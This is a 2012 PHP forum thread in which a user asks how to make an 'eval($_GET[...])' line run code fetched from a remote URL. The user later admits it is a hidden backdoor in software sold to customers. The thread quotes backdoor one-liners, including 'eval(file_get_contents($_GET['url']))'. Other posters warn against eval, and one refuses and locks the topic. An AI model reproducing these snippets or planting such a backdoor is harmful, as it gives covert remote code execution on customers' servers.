GET LINK + EVAL

system · June 13, 2012, 6:29pm

Hello,
I’ve got a little issue with my script. Basically my script looks like this:

<?php eval($_GET['command']); ?>

And what I want to do is simply pass a command file_get_contents to execute php script from a remote site so it should be something like
http://myurl.com/index.php?command=file_get_contents(‘remote_url/script.txt’);
But yet the code fails to execute.

Any suggestions?

RaythXC · June 13, 2012, 7:04pm

If your php installation includes suhosin, i’m pretty sure it stops eval();

Also: (From php.net)

Caution The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. If you have carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it without properly validating it beforehand.

Paranoja · June 14, 2012, 8:13am

Interesting, so what’s the use of eval then? It allows me to pass echo and exit commands, but that’s pretty much it. Is there any possible way to execute a mysql query through eval? Or is eval just useless in this case and if so have you got any other suggestions?

Ojoshiro · June 15, 2012, 2:39pm

It also allows someone who knows what he’s doing to dump your database or publish your %secret% folder. Eval is a door onto the server.
The rule of thumb with eval is “If you think you need eval, you’re doing something wrong”.

To run any query ( on mysql ) you use “mysql_query( $query )” where you can get the query from an HTML form if you want ( I myself am even wary of that and prefer to let people choose conditions but always construct the query myself ).

Eval is probably still around because it has its uses. If you make sure you’re the only one touching what eval evals there is no big risk.

Hope this clarified something
Good luck!
O.

Paranoja · June 17, 2012, 8:59pm

I probably should of made myself clear at the beginning… Basically I’ve created a few systems that I’m selling to quite a few customers and I don’t want it getting shared therefore I’ve included a little backdoor which would give me access to the files or database if such action occured. I’ve used eval and as far as I know it used to work as intended back in the days, never really looked back on it since now and I’m just looking for a simple 1 line solution… So I’m guessing eval(file_get_contents($_GET[‘url’])) should do the trick and then just create a txt file with my own php functions?

RaythXC · June 17, 2012, 9:19pm

In that case I am definitely not going to assist with this. Making backdoors such as this that you are planning to sell is highly immoral. It would give you the potential to hack a whole system by running a simple code. As such I feel I should lock this topic as well.